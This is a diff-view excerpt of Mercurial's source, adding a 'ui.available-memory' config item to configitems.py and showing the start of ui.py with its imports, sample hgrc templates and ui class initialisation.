1034 1034 )
1035 1035 coreconfigitem(
1036 1036 b'progress', b'delay', default=3,
1037 1037 )
1038 1038 coreconfigitem(
1039 1039 b'progress', b'disable', default=False,
1040 1040 )
1041 1041 coreconfigitem(
1042 1042 b'progress', b'estimateinterval', default=60.0,
1043 1043 )
1044 1044 coreconfigitem(
1045 1045 b'progress',
1046 1046 b'format',
1047 1047 default=lambda: [b'topic', b'bar', b'number', b'estimate'],
1048 1048 )
1049 1049 coreconfigitem(
1050 1050 b'progress', b'refresh', default=0.1,
1051 1051 )
1052 1052 coreconfigitem(
1053 1053 b'progress', b'width', default=dynamicdefault,
1054 1054 )
1055 1055 coreconfigitem(
1056 1056 b'pull', b'confirm', default=False,
1057 1057 )
1058 1058 coreconfigitem(
1059 1059 b'push', b'pushvars.server', default=False,
1060 1060 )
1061 1061 coreconfigitem(
1062 1062 b'rewrite',
1063 1063 b'backup-bundle',
1064 1064 default=True,
1065 1065 alias=[(b'ui', b'history-editing-backup')],
1066 1066 )
1067 1067 coreconfigitem(
1068 1068 b'rewrite', b'update-timestamp', default=False,
1069 1069 )
1070 1070 coreconfigitem(
1071 1071 b'storage', b'new-repo-backend', default=b'revlogv1', experimental=True,
1072 1072 )
1073 1073 coreconfigitem(
1074 1074 b'storage',
1075 1075 b'revlog.optimize-delta-parent-choice',
1076 1076 default=True,
1077 1077 alias=[(b'format', b'aggressivemergedeltas')],
1078 1078 )
1079 1079 # experimental as long as rust is experimental (or a C version is implemented)
1080 1080 coreconfigitem(
1081 1081 b'storage', b'revlog.nodemap.mmap', default=True, experimental=True
1082 1082 )
1083 1083 # experimental as long as format.use-persistent-nodemap is.
1084 1084 coreconfigitem(
1085 1085 b'storage', b'revlog.nodemap.mode', default=b'compat', experimental=True
1086 1086 )
1087 1087 coreconfigitem(
1088 1088 b'storage', b'revlog.reuse-external-delta', default=True,
1089 1089 )
1090 1090 coreconfigitem(
1091 1091 b'storage', b'revlog.reuse-external-delta-parent', default=None,
1092 1092 )
1093 1093 coreconfigitem(
1094 1094 b'storage', b'revlog.zlib.level', default=None,
1095 1095 )
1096 1096 coreconfigitem(
1097 1097 b'storage', b'revlog.zstd.level', default=None,
1098 1098 )
1099 1099 coreconfigitem(
1100 1100 b'server', b'bookmarks-pushkey-compat', default=True,
1101 1101 )
1102 1102 coreconfigitem(
1103 1103 b'server', b'bundle1', default=True,
1104 1104 )
1105 1105 coreconfigitem(
1106 1106 b'server', b'bundle1gd', default=None,
1107 1107 )
1108 1108 coreconfigitem(
1109 1109 b'server', b'bundle1.pull', default=None,
1110 1110 )
1111 1111 coreconfigitem(
1112 1112 b'server', b'bundle1gd.pull', default=None,
1113 1113 )
1114 1114 coreconfigitem(
1115 1115 b'server', b'bundle1.push', default=None,
1116 1116 )
1117 1117 coreconfigitem(
1118 1118 b'server', b'bundle1gd.push', default=None,
1119 1119 )
1120 1120 coreconfigitem(
1121 1121 b'server',
1122 1122 b'bundle2.stream',
1123 1123 default=True,
1124 1124 alias=[(b'experimental', b'bundle2.stream')],
1125 1125 )
1126 1126 coreconfigitem(
1127 1127 b'server', b'compressionengines', default=list,
1128 1128 )
1129 1129 coreconfigitem(
1130 1130 b'server', b'concurrent-push-mode', default=b'check-related',
1131 1131 )
1132 1132 coreconfigitem(
1133 1133 b'server', b'disablefullbundle', default=False,
1134 1134 )
1135 1135 coreconfigitem(
1136 1136 b'server', b'maxhttpheaderlen', default=1024,
1137 1137 )
1138 1138 coreconfigitem(
1139 1139 b'server', b'pullbundle', default=False,
1140 1140 )
1141 1141 coreconfigitem(
1142 1142 b'server', b'preferuncompressed', default=False,
1143 1143 )
1144 1144 coreconfigitem(
1145 1145 b'server', b'streamunbundle', default=False,
1146 1146 )
1147 1147 coreconfigitem(
1148 1148 b'server', b'uncompressed', default=True,
1149 1149 )
1150 1150 coreconfigitem(
1151 1151 b'server', b'uncompressedallowsecret', default=False,
1152 1152 )
1153 1153 coreconfigitem(
1154 1154 b'server', b'view', default=b'served',
1155 1155 )
1156 1156 coreconfigitem(
1157 1157 b'server', b'validate', default=False,
1158 1158 )
1159 1159 coreconfigitem(
1160 1160 b'server', b'zliblevel', default=-1,
1161 1161 )
1162 1162 coreconfigitem(
1163 1163 b'server', b'zstdlevel', default=3,
1164 1164 )
1165 1165 coreconfigitem(
1166 1166 b'share', b'pool', default=None,
1167 1167 )
1168 1168 coreconfigitem(
1169 1169 b'share', b'poolnaming', default=b'identity',
1170 1170 )
1171 1171 coreconfigitem(
1172 1172 b'shelve', b'maxbackups', default=10,
1173 1173 )
1174 1174 coreconfigitem(
1175 1175 b'smtp', b'host', default=None,
1176 1176 )
1177 1177 coreconfigitem(
1178 1178 b'smtp', b'local_hostname', default=None,
1179 1179 )
1180 1180 coreconfigitem(
1181 1181 b'smtp', b'password', default=None,
1182 1182 )
1183 1183 coreconfigitem(
1184 1184 b'smtp', b'port', default=dynamicdefault,
1185 1185 )
1186 1186 coreconfigitem(
1187 1187 b'smtp', b'tls', default=b'none',
1188 1188 )
1189 1189 coreconfigitem(
1190 1190 b'smtp', b'username', default=None,
1191 1191 )
1192 1192 coreconfigitem(
1193 1193 b'sparse', b'missingwarning', default=True, experimental=True,
1194 1194 )
1195 1195 coreconfigitem(
1196 1196 b'subrepos',
1197 1197 b'allowed',
1198 1198 default=dynamicdefault, # to make backporting simpler
1199 1199 )
1200 1200 coreconfigitem(
1201 1201 b'subrepos', b'hg:allowed', default=dynamicdefault,
1202 1202 )
1203 1203 coreconfigitem(
1204 1204 b'subrepos', b'git:allowed', default=dynamicdefault,
1205 1205 )
1206 1206 coreconfigitem(
1207 1207 b'subrepos', b'svn:allowed', default=dynamicdefault,
1208 1208 )
1209 1209 coreconfigitem(
1210 1210 b'templates', b'.*', default=None, generic=True,
1211 1211 )
1212 1212 coreconfigitem(
1213 1213 b'templateconfig', b'.*', default=dynamicdefault, generic=True,
1214 1214 )
1215 1215 coreconfigitem(
1216 1216 b'trusted', b'groups', default=list,
1217 1217 )
1218 1218 coreconfigitem(
1219 1219 b'trusted', b'users', default=list,
1220 1220 )
1221 1221 coreconfigitem(
1222 1222 b'ui', b'_usedassubrepo', default=False,
1223 1223 )
1224 1224 coreconfigitem(
1225 1225 b'ui', b'allowemptycommit', default=False,
1226 1226 )
1227 1227 coreconfigitem(
1228 1228 b'ui', b'archivemeta', default=True,
1229 1229 )
1230 1230 coreconfigitem(
1231 1231 b'ui', b'askusername', default=False,
1232 1232 )
1233 1233 coreconfigitem(
1234 b'ui', b'available-memory', default=None,
1235 )
1236
1237 coreconfigitem(
1234 1238 b'ui', b'clonebundlefallback', default=False,
1235 1239 )
1236 1240 coreconfigitem(
1237 1241 b'ui', b'clonebundleprefers', default=list,
1238 1242 )
1239 1243 coreconfigitem(
1240 1244 b'ui', b'clonebundles', default=True,
1241 1245 )
1242 1246 coreconfigitem(
1243 1247 b'ui', b'color', default=b'auto',
1244 1248 )
1245 1249 coreconfigitem(
1246 1250 b'ui', b'commitsubrepos', default=False,
1247 1251 )
1248 1252 coreconfigitem(
1249 1253 b'ui', b'debug', default=False,
1250 1254 )
1251 1255 coreconfigitem(
1252 1256 b'ui', b'debugger', default=None,
1253 1257 )
1254 1258 coreconfigitem(
1255 1259 b'ui', b'editor', default=dynamicdefault,
1256 1260 )
1257 1261 coreconfigitem(
1258 1262 b'ui', b'fallbackencoding', default=None,
1259 1263 )
1260 1264 coreconfigitem(
1261 1265 b'ui', b'forcecwd', default=None,
1262 1266 )
1263 1267 coreconfigitem(
1264 1268 b'ui', b'forcemerge', default=None,
1265 1269 )
1266 1270 coreconfigitem(
1267 1271 b'ui', b'formatdebug', default=False,
1268 1272 )
1269 1273 coreconfigitem(
1270 1274 b'ui', b'formatjson', default=False,
1271 1275 )
1272 1276 coreconfigitem(
1273 1277 b'ui', b'formatted', default=None,
1274 1278 )
1275 1279 coreconfigitem(
1276 1280 b'ui', b'graphnodetemplate', default=None,
1277 1281 )
1278 1282 coreconfigitem(
1279 1283 b'ui', b'interactive', default=None,
1280 1284 )
1281 1285 coreconfigitem(
1282 1286 b'ui', b'interface', default=None,
1283 1287 )
1284 1288 coreconfigitem(
1285 1289 b'ui', b'interface.chunkselector', default=None,
1286 1290 )
1287 1291 coreconfigitem(
1288 1292 b'ui', b'large-file-limit', default=10000000,
1289 1293 )
1290 1294 coreconfigitem(
1291 1295 b'ui', b'logblockedtimes', default=False,
1292 1296 )
1293 1297 coreconfigitem(
1294 1298 b'ui', b'logtemplate', default=None,
1295 1299 )
1296 1300 coreconfigitem(
1297 1301 b'ui', b'merge', default=None,
1298 1302 )
1299 1303 coreconfigitem(
1300 1304 b'ui', b'mergemarkers', default=b'basic',
1301 1305 )
1302 1306 coreconfigitem(
1303 1307 b'ui',
1304 1308 b'mergemarkertemplate',
1305 1309 default=(
1306 1310 b'{node|short} '
1307 1311 b'{ifeq(tags, "tip", "", '
1308 1312 b'ifeq(tags, "", "", "{tags} "))}'
1309 1313 b'{if(bookmarks, "{bookmarks} ")}'
1310 1314 b'{ifeq(branch, "default", "", "{branch} ")}'
1311 1315 b'- {author|user}: {desc|firstline}'
1312 1316 ),
1313 1317 )
1314 1318 coreconfigitem(
1315 1319 b'ui', b'message-output', default=b'stdio',
1316 1320 )
1317 1321 coreconfigitem(
1318 1322 b'ui', b'nontty', default=False,
1319 1323 )
1320 1324 coreconfigitem(
1321 1325 b'ui', b'origbackuppath', default=None,
1322 1326 )
1323 1327 coreconfigitem(
1324 1328 b'ui', b'paginate', default=True,
1325 1329 )
1326 1330 coreconfigitem(
1327 1331 b'ui', b'patch', default=None,
1328 1332 )
1329 1333 coreconfigitem(
1330 1334 b'ui', b'pre-merge-tool-output-template', default=None,
1331 1335 )
1332 1336 coreconfigitem(
1333 1337 b'ui', b'portablefilenames', default=b'warn',
1334 1338 )
1335 1339 coreconfigitem(
1336 1340 b'ui', b'promptecho', default=False,
1337 1341 )
1338 1342 coreconfigitem(
1339 1343 b'ui', b'quiet', default=False,
1340 1344 )
1341 1345 coreconfigitem(
1342 1346 b'ui', b'quietbookmarkmove', default=False,
1343 1347 )
1344 1348 coreconfigitem(
1345 1349 b'ui', b'relative-paths', default=b'legacy',
1346 1350 )
1347 1351 coreconfigitem(
1348 1352 b'ui', b'remotecmd', default=b'hg',
1349 1353 )
1350 1354 coreconfigitem(
1351 1355 b'ui', b'report_untrusted', default=True,
1352 1356 )
1353 1357 coreconfigitem(
1354 1358 b'ui', b'rollback', default=True,
1355 1359 )
1356 1360 coreconfigitem(
1357 1361 b'ui', b'signal-safe-lock', default=True,
1358 1362 )
1359 1363 coreconfigitem(
1360 1364 b'ui', b'slash', default=False,
1361 1365 )
1362 1366 coreconfigitem(
1363 1367 b'ui', b'ssh', default=b'ssh',
1364 1368 )
1365 1369 coreconfigitem(
1366 1370 b'ui', b'ssherrorhint', default=None,
1367 1371 )
1368 1372 coreconfigitem(
1369 1373 b'ui', b'statuscopies', default=False,
1370 1374 )
1371 1375 coreconfigitem(
1372 1376 b'ui', b'strict', default=False,
1373 1377 )
1374 1378 coreconfigitem(
1375 1379 b'ui', b'style', default=b'',
1376 1380 )
1377 1381 coreconfigitem(
1378 1382 b'ui', b'supportcontact', default=None,
1379 1383 )
1380 1384 coreconfigitem(
1381 1385 b'ui', b'textwidth', default=78,
1382 1386 )
1383 1387 coreconfigitem(
1384 1388 b'ui', b'timeout', default=b'600',
1385 1389 )
1386 1390 coreconfigitem(
1387 1391 b'ui', b'timeout.warn', default=0,
1388 1392 )
1389 1393 coreconfigitem(
1390 1394 b'ui', b'timestamp-output', default=False,
1391 1395 )
1392 1396 coreconfigitem(
1393 1397 b'ui', b'traceback', default=False,
1394 1398 )
1395 1399 coreconfigitem(
1396 1400 b'ui', b'tweakdefaults', default=False,
1397 1401 )
1398 1402 coreconfigitem(b'ui', b'username', alias=[(b'ui', b'user')])
1399 1403 coreconfigitem(
1400 1404 b'ui', b'verbose', default=False,
1401 1405 )
1402 1406 coreconfigitem(
1403 1407 b'verify', b'skipflags', default=None,
1404 1408 )
1405 1409 coreconfigitem(
1406 1410 b'web', b'allowbz2', default=False,
1407 1411 )
1408 1412 coreconfigitem(
1409 1413 b'web', b'allowgz', default=False,
1410 1414 )
1411 1415 coreconfigitem(
1412 1416 b'web', b'allow-pull', alias=[(b'web', b'allowpull')], default=True,
1413 1417 )
1414 1418 coreconfigitem(
1415 1419 b'web', b'allow-push', alias=[(b'web', b'allow_push')], default=list,
1416 1420 )
1417 1421 coreconfigitem(
1418 1422 b'web', b'allowzip', default=False,
1419 1423 )
1420 1424 coreconfigitem(
1421 1425 b'web', b'archivesubrepos', default=False,
1422 1426 )
1423 1427 coreconfigitem(
1424 1428 b'web', b'cache', default=True,
1425 1429 )
1426 1430 coreconfigitem(
1427 1431 b'web', b'comparisoncontext', default=5,
1428 1432 )
1429 1433 coreconfigitem(
1430 1434 b'web', b'contact', default=None,
1431 1435 )
1432 1436 coreconfigitem(
1433 1437 b'web', b'deny_push', default=list,
1434 1438 )
1435 1439 coreconfigitem(
1436 1440 b'web', b'guessmime', default=False,
1437 1441 )
1438 1442 coreconfigitem(
1439 1443 b'web', b'hidden', default=False,
1440 1444 )
1441 1445 coreconfigitem(
1442 1446 b'web', b'labels', default=list,
1443 1447 )
1444 1448 coreconfigitem(
1445 1449 b'web', b'logoimg', default=b'hglogo.png',
1446 1450 )
1447 1451 coreconfigitem(
1448 1452 b'web', b'logourl', default=b'https://mercurial-scm.org/',
1449 1453 )
1450 1454 coreconfigitem(
1451 1455 b'web', b'accesslog', default=b'-',
1452 1456 )
1453 1457 coreconfigitem(
1454 1458 b'web', b'address', default=b'',
1455 1459 )
1456 1460 coreconfigitem(
1457 1461 b'web', b'allow-archive', alias=[(b'web', b'allow_archive')], default=list,
1458 1462 )
1459 1463 coreconfigitem(
1460 1464 b'web', b'allow_read', default=list,
1461 1465 )
1462 1466 coreconfigitem(
1463 1467 b'web', b'baseurl', default=None,
1464 1468 )
1465 1469 coreconfigitem(
1466 1470 b'web', b'cacerts', default=None,
1467 1471 )
1468 1472 coreconfigitem(
1469 1473 b'web', b'certificate', default=None,
1470 1474 )
1471 1475 coreconfigitem(
1472 1476 b'web', b'collapse', default=False,
1473 1477 )
1474 1478 coreconfigitem(
1475 1479 b'web', b'csp', default=None,
1476 1480 )
1477 1481 coreconfigitem(
1478 1482 b'web', b'deny_read', default=list,
1479 1483 )
1480 1484 coreconfigitem(
1481 1485 b'web', b'descend', default=True,
1482 1486 )
1483 1487 coreconfigitem(
1484 1488 b'web', b'description', default=b"",
1485 1489 )
1486 1490 coreconfigitem(
1487 1491 b'web', b'encoding', default=lambda: encoding.encoding,
1488 1492 )
1489 1493 coreconfigitem(
1490 1494 b'web', b'errorlog', default=b'-',
1491 1495 )
1492 1496 coreconfigitem(
1493 1497 b'web', b'ipv6', default=False,
1494 1498 )
1495 1499 coreconfigitem(
1496 1500 b'web', b'maxchanges', default=10,
1497 1501 )
1498 1502 coreconfigitem(
1499 1503 b'web', b'maxfiles', default=10,
1500 1504 )
1501 1505 coreconfigitem(
1502 1506 b'web', b'maxshortchanges', default=60,
1503 1507 )
1504 1508 coreconfigitem(
1505 1509 b'web', b'motd', default=b'',
1506 1510 )
1507 1511 coreconfigitem(
1508 1512 b'web', b'name', default=dynamicdefault,
1509 1513 )
1510 1514 coreconfigitem(
1511 1515 b'web', b'port', default=8000,
1512 1516 )
1513 1517 coreconfigitem(
1514 1518 b'web', b'prefix', default=b'',
1515 1519 )
1516 1520 coreconfigitem(
1517 1521 b'web', b'push_ssl', default=True,
1518 1522 )
1519 1523 coreconfigitem(
1520 1524 b'web', b'refreshinterval', default=20,
1521 1525 )
1522 1526 coreconfigitem(
1523 1527 b'web', b'server-header', default=None,
1524 1528 )
1525 1529 coreconfigitem(
1526 1530 b'web', b'static', default=None,
1527 1531 )
1528 1532 coreconfigitem(
1529 1533 b'web', b'staticurl', default=None,
1530 1534 )
1531 1535 coreconfigitem(
1532 1536 b'web', b'stripes', default=1,
1533 1537 )
1534 1538 coreconfigitem(
1535 1539 b'web', b'style', default=b'paper',
1536 1540 )
1537 1541 coreconfigitem(
1538 1542 b'web', b'templates', default=None,
1539 1543 )
1540 1544 coreconfigitem(
1541 1545 b'web', b'view', default=b'served', experimental=True,
1542 1546 )
1543 1547 coreconfigitem(
1544 1548 b'worker', b'backgroundclose', default=dynamicdefault,
1545 1549 )
1546 1550 # Windows defaults to a limit of 512 open files. A buffer of 128
1547 1551 # should give us enough headway.
1548 1552 coreconfigitem(
1549 1553 b'worker', b'backgroundclosemaxqueue', default=384,
1550 1554 )
1551 1555 coreconfigitem(
1552 1556 b'worker', b'backgroundcloseminfilecount', default=2048,
1553 1557 )
1554 1558 coreconfigitem(
1555 1559 b'worker', b'backgroundclosethreadcount', default=4,
1556 1560 )
1557 1561 coreconfigitem(
1558 1562 b'worker', b'enabled', default=True,
1559 1563 )
1560 1564 coreconfigitem(
1561 1565 b'worker', b'numcpus', default=None,
1562 1566 )
1563 1567
1564 1568 # Rebase related configuration moved to core because other extension are doing
1565 1569 # strange things. For example, shelve import the extensions to reuse some bit
1566 1570 # without formally loading it.
1567 1571 coreconfigitem(
1568 1572 b'commands', b'rebase.requiredest', default=False,
1569 1573 )
1570 1574 coreconfigitem(
1571 1575 b'experimental', b'rebaseskipobsolete', default=True,
1572 1576 )
1573 1577 coreconfigitem(
1574 1578 b'rebase', b'singletransaction', default=False,
1575 1579 )
1576 1580 coreconfigitem(
1577 1581 b'rebase', b'experimental.inmemory', default=False,
1578 1582 )
@@ -1,2352 +1,2368 b''
1 1 # ui.py - user interface bits for mercurial
2 2 #
3 3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import collections
11 11 import contextlib
12 12 import datetime
13 13 import errno
14 14 import getpass
15 15 import inspect
16 16 import os
17 17 import re
18 18 import signal
19 19 import socket
20 20 import subprocess
21 21 import sys
22 22 import traceback
23 23
24 24 from .i18n import _
25 25 from .node import hex
26 26 from .pycompat import (
27 27 getattr,
28 28 open,
29 29 setattr,
30 30 )
31 31
32 32 from . import (
33 33 color,
34 34 config,
35 35 configitems,
36 36 encoding,
37 37 error,
38 38 formatter,
39 39 loggingutil,
40 40 progress,
41 41 pycompat,
42 42 rcutil,
43 43 scmutil,
44 44 util,
45 45 )
46 46 from .utils import (
47 47 dateutil,
48 48 procutil,
49 49 resourceutil,
50 50 stringutil,
51 51 )
52 52
53 53 urlreq = util.urlreq
54 54
55 55 # for use with str.translate(None, _keepalnum), to keep just alphanumerics
56 56 _keepalnum = b''.join(
57 57 c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
58 58 )
59 59
60 60 # The config knobs that will be altered (if unset) by ui.tweakdefaults.
61 61 tweakrc = b"""
62 62 [ui]
63 63 # The rollback command is dangerous. As a rule, don't use it.
64 64 rollback = False
65 65 # Make `hg status` report copy information
66 66 statuscopies = yes
67 67 # Prefer curses UIs when available. Revert to plain-text with `text`.
68 68 interface = curses
69 69 # Make compatible commands emit cwd-relative paths by default.
70 70 relative-paths = yes
71 71
72 72 [commands]
73 73 # Grep working directory by default.
74 74 grep.all-files = True
75 75 # Refuse to perform an `hg update` that would cause a file content merge
76 76 update.check = noconflict
77 77 # Show conflicts information in `hg status`
78 78 status.verbose = True
79 79 # Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
80 80 resolve.explicit-re-merge = True
81 81
82 82 [diff]
83 83 git = 1
84 84 showfunc = 1
85 85 word-diff = 1
86 86 """
87 87
88 88 samplehgrcs = {
89 89 b'user': b"""# example user config (see 'hg help config' for more info)
90 90 [ui]
91 91 # name and email, e.g.
92 92 # username = Jane Doe <jdoe@example.com>
93 93 username =
94 94
95 95 # We recommend enabling tweakdefaults to get slight improvements to
96 96 # the UI over time. Make sure to set HGPLAIN in the environment when
97 97 # writing scripts!
98 98 # tweakdefaults = True
99 99
100 100 # uncomment to disable color in command output
101 101 # (see 'hg help color' for details)
102 102 # color = never
103 103
104 104 # uncomment to disable command output pagination
105 105 # (see 'hg help pager' for details)
106 106 # paginate = never
107 107
108 108 [extensions]
109 109 # uncomment the lines below to enable some popular extensions
110 110 # (see 'hg help extensions' for more info)
111 111 #
112 112 # histedit =
113 113 # rebase =
114 114 # uncommit =
115 115 """,
116 116 b'cloned': b"""# example repository config (see 'hg help config' for more info)
117 117 [paths]
118 118 default = %s
119 119
120 120 # path aliases to other clones of this repo in URLs or filesystem paths
121 121 # (see 'hg help config.paths' for more info)
122 122 #
123 123 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
124 124 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
125 125 # my-clone = /home/jdoe/jdoes-clone
126 126
127 127 [ui]
128 128 # name and email (local to this repository, optional), e.g.
129 129 # username = Jane Doe <jdoe@example.com>
130 130 """,
131 131 b'local': b"""# example repository config (see 'hg help config' for more info)
132 132 [paths]
133 133 # path aliases to other clones of this repo in URLs or filesystem paths
134 134 # (see 'hg help config.paths' for more info)
135 135 #
136 136 # default = http://example.com/hg/example-repo
137 137 # default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
138 138 # my-fork = ssh://jdoe@example.net/hg/jdoes-fork
139 139 # my-clone = /home/jdoe/jdoes-clone
140 140
141 141 [ui]
142 142 # name and email (local to this repository, optional), e.g.
143 143 # username = Jane Doe <jdoe@example.com>
144 144 """,
145 145 b'global': b"""# example system-wide hg config (see 'hg help config' for more info)
146 146
147 147 [ui]
148 148 # uncomment to disable color in command output
149 149 # (see 'hg help color' for details)
150 150 # color = never
151 151
152 152 # uncomment to disable command output pagination
153 153 # (see 'hg help pager' for details)
154 154 # paginate = never
155 155
156 156 [extensions]
157 157 # uncomment the lines below to enable some popular extensions
158 158 # (see 'hg help extensions' for more info)
159 159 #
160 160 # blackbox =
161 161 # churn =
162 162 """,
163 163 }
164 164
165 165
166 166 def _maybestrurl(maybebytes):
167 167 return pycompat.rapply(pycompat.strurl, maybebytes)
168 168
169 169
170 170 def _maybebytesurl(maybestr):
171 171 return pycompat.rapply(pycompat.bytesurl, maybestr)
172 172
173 173
174 174 class httppasswordmgrdbproxy(object):
175 175 """Delays loading urllib2 until it's needed."""
176 176
177 177 def __init__(self):
178 178 self._mgr = None
179 179
180 180 def _get_mgr(self):
181 181 if self._mgr is None:
182 182 self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
183 183 return self._mgr
184 184
185 185 def add_password(self, realm, uris, user, passwd):
186 186 return self._get_mgr().add_password(
187 187 _maybestrurl(realm),
188 188 _maybestrurl(uris),
189 189 _maybestrurl(user),
190 190 _maybestrurl(passwd),
191 191 )
192 192
193 193 def find_user_password(self, realm, uri):
194 194 mgr = self._get_mgr()
195 195 return _maybebytesurl(
196 196 mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
197 197 )
198 198
199 199
200 200 def _catchterm(*args):
201 201 raise error.SignalInterrupt
202 202
203 203
204 204 # unique object used to detect no default value has been provided when
205 205 # retrieving configuration value.
206 206 _unset = object()
207 207
208 208 # _reqexithandlers: callbacks run at the end of a request
209 209 _reqexithandlers = []
210 210
211 211
212 212 class ui(object):
213 213 def __init__(self, src=None):
214 214 """Create a fresh new ui object if no src given
215 215
216 216 Use uimod.ui.load() to create a ui which knows global and user configs.
217 217 In most cases, you should use ui.copy() to create a copy of an existing
218 218 ui object.
219 219 """
220 220 # _buffers: used for temporary capture of output
221 221 self._buffers = []
222 222 # 3-tuple describing how each buffer in the stack behaves.
223 223 # Values are (capture stderr, capture subprocesses, apply labels).
224 224 self._bufferstates = []
225 225 # When a buffer is active, defines whether we are expanding labels.
226 226 # This exists to prevent an extra list lookup.
227 227 self._bufferapplylabels = None
228 228 self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
229 229 self._reportuntrusted = True
230 230 self._knownconfig = configitems.coreitems
231 231 self._ocfg = config.config() # overlay
232 232 self._tcfg = config.config() # trusted
233 233 self._ucfg = config.config() # untrusted
234 234 self._trustusers = set()
235 235 self._trustgroups = set()
236 236 self.callhooks = True
237 237 # Insecure server connections requested.
238 238 self.insecureconnections = False
239 239 # Blocked time
240 240 self.logblockedtimes = False
241 241 # color mode: see mercurial/color.py for possible value
242 242 self._colormode = None
243 243 self._terminfoparams = {}
244 244 self._styles = {}
245 245 self._uninterruptible = False
246 246 self.showtimestamp = False
247 247
248 248 if src:
249 249 self._fout = src._fout
250 250 self._ferr = src._ferr
251 251 self._fin = src._fin
252 252 self._fmsg = src._fmsg
253 253 self._fmsgout = src._fmsgout
254 254 self._fmsgerr = src._fmsgerr
255 255 self._finoutredirected = src._finoutredirected
256 256 self._loggers = src._loggers.copy()
257 257 self.pageractive = src.pageractive
258 258 self._disablepager = src._disablepager
259 259 self._tweaked = src._tweaked
260 260
261 261 self._tcfg = src._tcfg.copy()
262 262 self._ucfg = src._ucfg.copy()
263 263 self._ocfg = src._ocfg.copy()
264 264 self._trustusers = src._trustusers.copy()
265 265 self._trustgroups = src._trustgroups.copy()
266 266 self.environ = src.environ
267 267 self.callhooks = src.callhooks
268 268 self.insecureconnections = src.insecureconnections
269 269 self._colormode = src._colormode
270 270 self._terminfoparams = src._terminfoparams.copy()
271 271 self._styles = src._styles.copy()
272 272
273 273 self.fixconfig()
274 274
275 275 self.httppasswordmgrdb = src.httppasswordmgrdb
276 276 self._blockedtimes = src._blockedtimes
277 277 else:
278 278 self._fout = procutil.stdout
279 279 self._ferr = procutil.stderr
280 280 self._fin = procutil.stdin
281 281 self._fmsg = None
282 282 self._fmsgout = self.fout # configurable
283 283 self._fmsgerr = self.ferr # configurable
284 284 self._finoutredirected = False
285 285 self._loggers = {}
286 286 self.pageractive = False
287 287 self._disablepager = False
288 288 self._tweaked = False
289 289
290 290 # shared read-only environment
291 291 self.environ = encoding.environ
292 292
293 293 self.httppasswordmgrdb = httppasswordmgrdbproxy()
294 294 self._blockedtimes = collections.defaultdict(int)
295 295
296 296 allowed = self.configlist(b'experimental', b'exportableenviron')
297 297 if b'*' in allowed:
298 298 self._exportableenviron = self.environ
299 299 else:
300 300 self._exportableenviron = {}
301 301 for k in allowed:
302 302 if k in self.environ:
303 303 self._exportableenviron[k] = self.environ[k]
304 304
305 305 @classmethod
306 306 def load(cls):
307 307 """Create a ui and load global and user configs"""
308 308 u = cls()
309 309 # we always trust global config files and environment variables
310 310 for t, f in rcutil.rccomponents():
311 311 if t == b'path':
312 312 u.readconfig(f, trust=True)
313 313 elif t == b'resource':
314 314 u.read_resource_config(f, trust=True)
315 315 elif t == b'items':
316 316 sections = set()
317 317 for section, name, value, source in f:
318 318 # do not set u._ocfg
319 319 # XXX clean this up once immutable config object is a thing
320 320 u._tcfg.set(section, name, value, source)
321 321 u._ucfg.set(section, name, value, source)
322 322 sections.add(section)
323 323 for section in sections:
324 324 u.fixconfig(section=section)
325 325 else:
326 326 raise error.ProgrammingError(b'unknown rctype: %s' % t)
327 327 u._maybetweakdefaults()
328 328 return u
329 329
330 330 def _maybetweakdefaults(self):
331 331 if not self.configbool(b'ui', b'tweakdefaults'):
332 332 return
333 333 if self._tweaked or self.plain(b'tweakdefaults'):
334 334 return
335 335
336 336 # Note: it is SUPER IMPORTANT that you set self._tweaked to
337 337 # True *before* any calls to setconfig(), otherwise you'll get
338 338 # infinite recursion between setconfig and this method.
339 339 #
340 340 # TODO: We should extract an inner method in setconfig() to
341 341 # avoid this weirdness.
342 342 self._tweaked = True
343 343 tmpcfg = config.config()
344 344 tmpcfg.parse(b'<tweakdefaults>', tweakrc)
345 345 for section in tmpcfg:
346 346 for name, value in tmpcfg.items(section):
347 347 if not self.hasconfig(section, name):
348 348 self.setconfig(section, name, value, b"<tweakdefaults>")
349 349
350 350 def copy(self):
351 351 return self.__class__(self)
352 352
353 353 def resetstate(self):
354 354 """Clear internal state that shouldn't persist across commands"""
355 355 if self._progbar:
356 356 self._progbar.resetstate() # reset last-print time of progress bar
357 357 self.httppasswordmgrdb = httppasswordmgrdbproxy()
358 358
359 359 @contextlib.contextmanager
360 360 def timeblockedsection(self, key):
361 361 # this is open-coded below - search for timeblockedsection to find them
362 362 starttime = util.timer()
363 363 try:
364 364 yield
365 365 finally:
366 366 self._blockedtimes[key + b'_blocked'] += (
367 367 util.timer() - starttime
368 368 ) * 1000
369 369
370 370 @contextlib.contextmanager
371 371 def uninterruptible(self):
372 372 """Mark an operation as unsafe.
373 373
374 374 Most operations on a repository are safe to interrupt, but a
375 375 few are risky (for example repair.strip). This context manager
376 376 lets you advise Mercurial that something risky is happening so
377 377 that control-C etc can be blocked if desired.
378 378 """
379 379 enabled = self.configbool(b'experimental', b'nointerrupt')
380 380 if enabled and self.configbool(
381 381 b'experimental', b'nointerrupt-interactiveonly'
382 382 ):
383 383 enabled = self.interactive()
384 384 if self._uninterruptible or not enabled:
385 385 # if nointerrupt support is turned off, the process isn't
386 386 # interactive, or we're already in an uninterruptible
387 387 # block, do nothing.
388 388 yield
389 389 return
390 390
391 391 def warn():
392 392 self.warn(_(b"shutting down cleanly\n"))
393 393 self.warn(
394 394 _(b"press ^C again to terminate immediately (dangerous)\n")
395 395 )
396 396 return True
397 397
398 398 with procutil.uninterruptible(warn):
399 399 try:
400 400 self._uninterruptible = True
401 401 yield
402 402 finally:
403 403 self._uninterruptible = False
404 404
405 405 def formatter(self, topic, opts):
406 406 return formatter.formatter(self, self, topic, opts)
407 407
408 408 def _trusted(self, fp, f):
409 409 st = util.fstat(fp)
410 410 if util.isowner(st):
411 411 return True
412 412
413 413 tusers, tgroups = self._trustusers, self._trustgroups
